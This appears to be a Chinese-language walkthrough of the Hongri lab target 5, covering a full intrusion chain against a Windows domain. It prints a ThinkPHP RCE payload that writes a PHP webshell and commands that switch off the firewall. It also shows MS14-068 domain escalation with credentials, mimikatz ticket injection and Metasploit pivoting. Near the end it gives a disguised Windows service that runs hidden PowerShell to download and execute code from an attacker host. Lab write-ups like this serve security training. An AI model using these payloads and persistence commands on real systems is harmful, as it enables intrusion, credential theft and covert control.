红日靶机五

一、信息收集

cms扫描

端口扫描

目录扫描

输入错误路径，发现是5.0.22版本

查找poc

命令执行 插入木马

http://192.168.62.128?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php eval($_POST[cmd]);?^> > 1.php

信息收集

ipconfig  /all

二、cs反弹

vps上线cs  创建监听

目标机上线失败（步骤省略）

设置在kali     启动cs

设置心跳，靶机个人可以直接设置为1

三、提权

shell systeminfo

Interact 打开beacon

Access

      dumphashes 获取hash

      Elevate 提权

      GoldenTicket 生成黄金票据注入当前会话

      MAketoken  凭证转换

      RunMimikatz 运行Mimikatz

      SpawnAs 用其他用户生成CobaltStrike侦听器

Explore

      BrowserPivot 劫持目标浏览器进程

      Desktop(VNC)  桌面交互

      FileBrowser  文件浏览器

      NetView 命令Net View

      Portscan 端口扫描

      Processlist 进程列表

      Screenshot截图

Pivoting

      SOCKSServer 代理服务

      Listener  反向端口转发

      DeployVPN 部署VPN

Spawn

      新的通讯模式并生成会话

Session  会话管理

    获取hash

利用cs提权

提权成功得到一个system权限

桌面交互

文件浏览

查看端口

查看进程

屏幕截图

查看防火墙并关闭

shell netsh firewall show state

shell netsh advfirewall set allprofiles state off

四、内网信息收集（准备横向）

ip地址信息

shell ipconfig

扫描端口

信息收集

net user xxx   /domain                   查询用户的详细信息

net   config   workstation                        查询当前登录域及登录用户信息

net   time  /domain                                  用于判断主域（域服务器常作为时间服务器）

net   view  /domain                      查询域

net  view   /domain:xxx                     查询域内所有计算机

net  group    /domain                         查询域内所有用户组列表

nltest   /domain_trusts          　　　　　　获取域信任信息

nltest         /dclist:xxxx                       获取域控的机器名

查询域  查询域控

net view

net dclist

shell net user

抓取密码

发现leo用户

五、身份伪造

使用spawn as命令生成其他用户凭据

查看内网主机

net view

查看域控组

shell net group "Domain Controllers" /domain

查看域管理员

shell net group "Domain Admins" /domain

查看用户SID

shell whoami /all

收集域内信息

net user \192.168.138.138

查看修补程序

六、域提权

文件上传

进行提权  MS14-068尝试一下域提权

MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>

输入

shell ms14-068.exe -u leo@sun.com -p 123.com -s S-1-5-21-3388020223-1982701712-4030140183-1110 -d 192.168.138.138

命令执行后，会创建.ccache文件。证明漏洞触发成功。

七、进程注入内存

mimikatz kerberos::purge  清空当前机器中所有凭证

mimikatz kerberos::list 查看当前机器凭证

mimikatz kerberos::ptc TGT_leo@sun.com.ccache 将票据注入到内存中

八、横向渗透

横向渗透进入域控

信息收集

九、联动msf

修改msf监听为tcp

改为reverse_tcp  和443 端口

十、Socks代理

添加路由

run autoroute -s 192.168.138.0/24

run autoroute -p

或者

自动添加：run post/multi/manage/autoroute

成功添加路由后，即可使用auxiliary/server/socks4a进行代理操作

use auxiliary/server/socks4a

options #详细设置信息

set srvport 1000 #设置代理端口

run

端口转发工具出现了问题

十一、持久控制

设置powershell脚本开机自启动后门。

使用SC命令创建windows服务名最好伪装下,binpath= 这里一定要注意有个空格不然创建不成功把powershell远程执行下载命令也包含进去地址

 shell sc create "bingtang" binpath= "cmd /c start powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://vps或者kali地址/a'))""

这时目标就会有个刚创建个为"bingtang"的服务,可执行文件的路径都在刚刚命令执行过程中指定到的里面

shell sc config "name" start= auto 我们需要把这个name服务设置为自动。

shell sc description "bingtang" "description" 设置服务的描述字符串

net start "bingtang" 启动服务

shell sc delete "bingtang" 删除这个服务，不想使用服务直接删除

学习文章

https://www.icode9.com/content-4-711312.html